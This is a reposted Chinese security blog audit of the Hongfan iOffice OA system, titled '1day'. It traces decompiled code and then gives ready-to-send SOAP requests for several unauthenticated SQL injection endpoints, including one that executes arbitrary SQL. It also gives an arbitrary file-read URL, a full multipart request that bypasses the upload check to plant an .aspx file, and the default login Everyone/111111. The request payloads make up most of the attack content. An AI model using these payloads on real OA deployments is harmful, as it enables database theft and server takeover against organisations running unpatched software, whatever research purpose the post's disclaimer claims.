1day | 红帆OA系统审计 | CN-SEC 中文网

admin

138717
文章

114
评论

2024年3月4日18:27:57评论165 views字数 7491阅读24分58秒阅读模式

一、概述

红帆OA代码如下：

1day | 红帆OA系统审计

查看登录Login.asp,如下：

1day | 红帆OA系统审计

文件的后端代码在ioffice.dll 中的Unilogin这个类中。

在bin文件中把全部的DLL反编译，定位到ioffice中的Unilogin类。

1day | 红帆OA系统审计

二、审

Unilogin类继承ioLoginBase类

查看ioLoginBase类继承page类

1day | 红帆OA系统审计

继续跟进

1day | 红帆OA系统审计

看到AspNetHostingPermission 类似权限的东西

1day | 红帆OA系统审计

这里进行跟跳

1day | 红帆OA系统审计

意味着 继承了page的类都是要授权才可以进入的。

发现确实是权限验证

这里猜测继承了page 它自己写了一个start.cs 让/ioffice/login直接跳过了后端权限验证直接可以访问，但是这里还是做了接口登录校验的。

话不多说 继续往下面走。

 
#类似这种方式发现，需要授权的类如下：

WebPageBase、WebControlBase、MasterPageBase、 HttpApplication……

三、 SQL注入

前台

1、/iOffice/prg/set/wss/ioDesktopData.asmx

ioDesktopData 类继承WebService 这个类可以未授权

1day | 红帆OA系统审计

跟进代码发现方法GetDepSchedule 存在SQL注入

1day | 红帆OA系统审计

this.GetDepCode() 直接把参数放入SQL语句里面

1day | 红帆OA系统审计

SqlData.ExecuteScalar 这个方法也没过滤直接放入进去，然后执行了SQL语句

数据包如下

POST http://xxxxxx/iOffice/prg/set/wss/ioDesktopData.asmx HTTP/1.1
Host: xxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
SOAPAction: http://tempuri.org/GetDepSchedule
Content-Type: text/xml;charset=UTF-8
Content-Length: 282

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/">
<soap:Header/>
<soap:Body>
<tem:GetDepSchedule>
<!--type: string-->
<tem:EmpLoginID>111*</tem:EmpLoginID>
</tem:GetDepSchedule>
</soap:Body>
</soap:Envelope>

1day | 红帆OA系统审计

2、/Office/prg/set/wss/wssRtSyn.asmx

未授权类WebService

1day | 红帆OA系统审计

第一个 GetRootBranchName函数拼接导致SQL注入

1day | 红帆OA系统审计

POST http://xxxxxx/iOffice/prg/set/wss/wssRtSyn.asmx HTTP/1.1
Host: xxxxxx
SOAPAction: http://iOffice.net/iOffice/ioRtSyn/SubmitLogInfo
Content-Type: text/xml
Cookie: ASP.NET_SessionId=s5zjcxf0isg4r045ujqnyur3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Encoding: gzip,deflate
Content-Length: 457
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tns="http://iOffice.net/iOffice/ioRtSyn">
<soap:Header />
<soap:Body>
<tns: GetRootBranchName>
<tns:ServerHost>111‘</tns:ServerHost>
</tns: GetRootBranchName>
</soap:Body>
</soap:Envelope>

1day | 红帆OA系统审计

第二个SubmitLogInfo 函数

1day | 红帆OA系统审计

直接拼接导致SQL注入

1day | 红帆OA系统审计

POST http://xxxxx/iOffice/prg/set/wss/wssRtSyn.asmx HTTP/1.1
Host: xxxxxx
SOAPAction: http://iOffice.net/iOffice/ioRtSyn/SubmitLogInfo
Content-Type: text/xml
Cookie: ASP.NET_SessionId=s5zjcxf0isg4r045ujqnyur3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Encoding: gzip,deflate
Content-Length: 457
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tns="http://iOffice.net/iOffice/ioRtSyn">
<soap:Header />
<soap:Body>
<tns:SubmitLogInfo>
<tns:data>TzwSVsOw</tns:data>
<tns:ServerHost>222‘</tns:ServerHost>
</tns:SubmitLogInfo>
</soap:Body>
</soap:Envelope>

1day | 红帆OA系统审计

3、/iOffice/prg/set/wss/UserForm.asmx

1day | 红帆OA系统审计

函数 GetBase

1day | 红帆OA系统审计

ModCode 和 baseName 直接拼接

1day | 红帆OA系统审计

POST http://xxxxx/ioffice/prg/set/wss/UserForm.asmx HTTP/1.1
Host: xxxxxx
Content-Type: text/xml; charset=utf-8
Content-Length: 386
SOAPAction: "http://tempuri.org/GetBase"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetBase xmlns="http://tempuri.org/">
      <modCode>string'</modCode>
      <BaseName>string</BaseName>
    </GetBase>
  </soap:Body>
</soap:Envelope>

1day | 红帆OA系统审计

4、/ioffice/prg/set/wss/ioAssistance2.asmx

1day | 红帆OA系统审计

POST http://xxxxx/ioffice/prg/set/wss/ioAssistance2.asmx HTTP/1.1
Host: xxxxxx
Content-Type: text/xml; charset=utf-8
Content-Length: 347
SOAPAction: "http://tempuri.org/GetEmpInf"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetEmpInf xmlns="http://tempuri.org/">
      <sql>select (@@version) </sql>
    </GetEmpInf>
  </soap:Body>
</soap:Envelope>

1day | 红帆OA系统审计

5、/iOffice/prg/Mobile/WSLoginMobile.asmx

大概率有，太菜没挖到

6、/iOffice/prg/set/wss/wssRtFile.aspx?Host=1

1day | 红帆OA系统审计

7、/iOffice/prg/set/wss/udfmr.asmx

1day | 红帆OA系统审计

GetEmpSearch函数中参数condition直接拼接进去导致SQL注入

1day | 红帆OA系统审计

POST http://xxx/iOffice/prg/set/wss/udfmr.asmx HTTP/1.0
Host: xxxx
X-Real-IP: xxxx
X-Forwarded-For: xxxx   
Connection: close
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"


<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
<condition>1=@@version</condition>
</GetEmpSearch>
</soap:Body>
</soap:Envelope>

后台

1、/iOffice/prg/set/wss/bbsIndex1.aspx?g=bbstheme&postid=1

2、/iOffice/prg/set/ioCom/swfupload/upload.aspx?SessionID=1&ModeServerID=00000000-0000-0000-0000-000000000000

四、后台任意文件下载/读取

1、/iOffice/prg/set/iocom/ioFileExport.aspx

访问路径： 
/iOffice/prg/set/iocom/ioFileExport.aspx?  url=/ioffice/upfiles/otherfiles/Picture/3/2023/4/20230425111749.asp=20230425111749.asp&ContentType=application/octet-stream       

/iOffice/prg/set/iocom/ioFileExport.aspx?  url=xxxxxxxx&filename=20230425111749.asp&ContentType=application/octet-stream

五、后台任意文件上传

上传地址

/ioffice/prg/udf/Component/imgupload.aspx

1day | 红帆OA系统审计

上传的content-type 是image 就绕过了后端的限制

1day | 红帆OA系统审计

POST http://xxxxx/ioffice/prg/udf/Component/imgupload.aspx HTTP/1.1
Host: xxxx
Content-Length: 893
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://111.9.78.63:82
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycW9xbcF2Jqk6mvbD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://111.9.78.63:82/ioffice/prg/udf/Component/imgupload.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=v1moan3ltmc50wm5a453hsem; iOffice.net=loginid=ZXZlcnlvbmU=&branchid=0&sam=NzQ0NDI0MjY4Tzc0NDQyNDI2OE83NDQ0MjQyNjhPNzQ0NDI0MjY4Tzc0NDQyNDI2OE83NDQ0MjQyNjg=&savepwd=False&LoginInWindow=False; LoginLanguage=Language=zh-cn; .iOffice=C06B60FA969B6CC68AAD9AD38D30382D76C7421A2E70632F0AA1CFA387804049DB0DEBEACBF41D294063DBDBB5DC814C6B54DBADBC799EE0EE3ED55B0097D3F914013085A6BEAAA53C9FA2C9FCCF5E8B493C67230E618160358805964A74718991C86984A883EDE429FFD083A58234944816024A
Connection: close

------WebKitFormBoundarycW9xbcF2Jqk6mvbD
Content-Disposition: form-data; name="__EVENTTARGET"

ctl00$cntButton$cmdUpFile
------WebKitFormBoundarycW9xbcF2Jqk6mvbD
Content-Disposition: form-data; name="__EVENTARGUMENT"


------WebKitFormBoundarycW9xbcF2Jqk6mvbD
Content-Disposition: form-data; name="__VIEWSTATE"

/wEPDwUKMTI5MzA1Mjk2Nw8WAh4FaW1naWRlFgJmDw8WBB4MUGFnZVRpdGxlU2VsCyllaU9mZmljZS5pb1BhZ2VFZGl0K1BhZ2VUaXRsZVNlbE9wdGlvbiwgaU9mZmljZSwgVmVyc2lvbj0xLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPW51bGwDHgxwZXJjZW50d2lkdGgC/////w9kFgICAw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYCAgUPZBYCZg9kFgJmD2QWBgIDDw8WAh4HVmlzaWJsZWhkZAIFDw8WAh8EaGRkAgcPFgIfBGhkZA==
------WebKitFormBoundarycW9xbcF2Jqk6mvbD
Content-Disposition: form-data; name="ctl00$cntForm$File1"; filename="1.aspx"
Content-Type: image/png

111111111111111111111111111111111111111111111111111111111111111111111111
------WebKitFormBoundarycW9xbcF2Jqk6mvbD--

1day | 红帆OA系统审计

/ioffice/prg/set/HtmlEdit/editor/dialog/fck_upload.aspx

1day | 红帆OA系统审计

/ioffice/prg/set/HtmlEdit/plugins/image.aspx

1day | 红帆OA系统审计

六、默认口令

Everyone /  111111

原文始发于微信公众号（小黑说安全）：1day | 红帆OA系统审计

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

1day | 红帆OA系统审计

一、概述

二、审

三、 SQL注入

前台

1、/iOffice/prg/set/wss/ioDesktopData.asmx

2、/Office/prg/set/wss/wssRtSyn.asmx

3、/iOffice/prg/set/wss/UserForm.asmx

4、/ioffice/prg/set/wss/ioAssistance2.asmx

5、/iOffice/prg/Mobile/WSLoginMobile.asmx

6、/iOffice/prg/set/wss/wssRtFile.aspx?Host=1

7、/iOffice/prg/set/wss/udfmr.asmx

后台

1、/iOffice/prg/set/wss/bbsIndex1.aspx?g=bbstheme&postid=1

2、/iOffice/prg/set/ioCom/swfupload/upload.aspx?SessionID=1&ModeServerID=00000000-0000-0000-0000-000000000000

四、后台任意文件下载/读取

1、/iOffice/prg/set/iocom/ioFileExport.aspx

五、后台任意文件上传

上传地址

/ioffice/prg/udf/Component/imgupload.aspx

/ioffice/prg/set/HtmlEdit/editor/dialog/fck_upload.aspx

/ioffice/prg/set/HtmlEdit/plugins/image.aspx

六、默认口令

JAVA安全调试篇（无源码远程调试WAR包(以S2-001为例)）

某PHP代码审计前台RCE漏洞案例分析

源代码审计常见漏洞

fastjson1.2.80 in Springtboot新链学习记录

【万字详细】PHP与ThinkPHP框架代码审计综合技巧

某天OA-workFlowService-多处SQL注入漏洞分析

【Python代码审计】佰阅发卡存在前台RCE漏洞

记一次某流量卡平台代码审计

『代码审计』JEEWMS代码审计

AI自动化代码审计RCE

发表评论

一、 概述

二、 审

三、 SQL注入

前台

1、/iOffice/prg/set/wss/ioDesktopData.asmx

2、/Office/prg/set/wss/wssRtSyn.asmx

3、/iOffice/prg/set/wss/UserForm.asmx

4、/ioffice/prg/set/wss/ioAssistance2.asmx

5、/iOffice/prg/Mobile/WSLoginMobile.asmx

6、/iOffice/prg/set/wss/wssRtFile.aspx?Host=1

7、/iOffice/prg/set/wss/udfmr.asmx

后台

1、/iOffice/prg/set/wss/bbsIndex1.aspx?g=bbstheme&postid=1

2、/iOffice/prg/set/ioCom/swfupload/upload.aspx?SessionID=1&ModeServerID=00000000-0000-0000-0000-000000000000

四、 后台任意文件下载/读取

1、/iOffice/prg/set/iocom/ioFileExport.aspx

五、 后台任意文件上传

上传地址

/ioffice/prg/udf/Component/imgupload.aspx

/ioffice/prg/set/HtmlEdit/editor/dialog/fck_upload.aspx

/ioffice/prg/set/HtmlEdit/plugins/image.aspx

六、默认口令

发表评论

一、概述

二、审

四、后台任意文件下载/读取

五、后台任意文件上传